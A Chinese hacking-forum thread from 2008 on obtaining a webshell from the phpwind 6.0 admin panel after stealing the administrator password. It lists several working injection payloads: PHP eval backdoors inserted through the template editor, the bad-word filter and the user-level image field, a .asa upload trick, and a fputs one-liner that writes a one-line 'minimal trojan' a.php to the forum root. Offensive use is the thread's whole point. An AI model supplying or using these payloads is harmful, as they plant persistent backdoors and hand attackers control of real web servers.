标题:
[讨论]phpwind6.0后台怎么拿shell?
[打印本页]
作者:
s37su37
时间:
2008-7-21 00:49
标题:
[讨论]phpwind6.0后台怎么拿shell?
[讨论]phpwind6.0后台怎么拿shell?
议题作者:
pt007@vip.sina.com
PHPwind后台获取Webshell,下面的几种方法我都试过了,没有一个成功的
由于4.6号发现的一个phpwind漏洞搞的热闹非凡,该漏洞是因为message.php 文件的几个变量未进行过滤造成的。官方已发布补丁,所以我在这里摘一点关于取得管理密码后怎么拿webshell的方法:
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码记住,这代码必须顶着左边行写,代码前面不可以有任何字符。 EOT; eval($a); print <<<EOT
例如,我写完某一行为。 .headurl { color:#ffffff;} EOT; eval($_POST['a']); print <<<EOT .index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell http://localhost/bbs/index.php (由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)密码是a lanker的一句话后门。
方始2 脏话过滤法
进入安全管理 ◇ 不良词语过滤
新增 不良词语写 a']='aa';eval($_POST['a']);// 替换为那里可以随意写
而后得到一个shell地址为 http://localhost/bbs/data/bbscache/wordsfb.php
密码是a lanker的一句话后门。
方式3 用户等级管理然后新建立会员组头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a';eval($_POST['a']);// 升级点数依然可以随意写。
而后得到一个shell地址为 http://localhost/bbs/data/bbscache/level.php 密码是a lanker的一句话后门。
这里提供的方式随便你选一种都可以得到shell。。。方式三请按说明仔细操作,否则会导致论坛无法正常运行,后果,自负。可我一一试过,没能拿到SHELL.
三种方法
1:后台添加个 asa 上传
2:<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>然后看图修改包含银行查件文件名
bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一
个a.php的最小马。
3:不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>插入,然后
备份wordsfb字段记下相对路径。 ----------------------------------------------------------------------
phpwind后台获得shell(貌似很管用)如果是winnt系统直接添加一个.asa后缀的文件,(dz可以直接传asa)在后台找到文件上传的后的文件名,论坛发个phpshell,<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?> 然后看图修改包含银行查件文件名bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一个a.php的最小马。还有不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>插入,然后备份wordsfb字段记下相对路径。每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!
帖子209 精华
30
积分3816 阅读权限100 性别男 在线时间432 小时
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2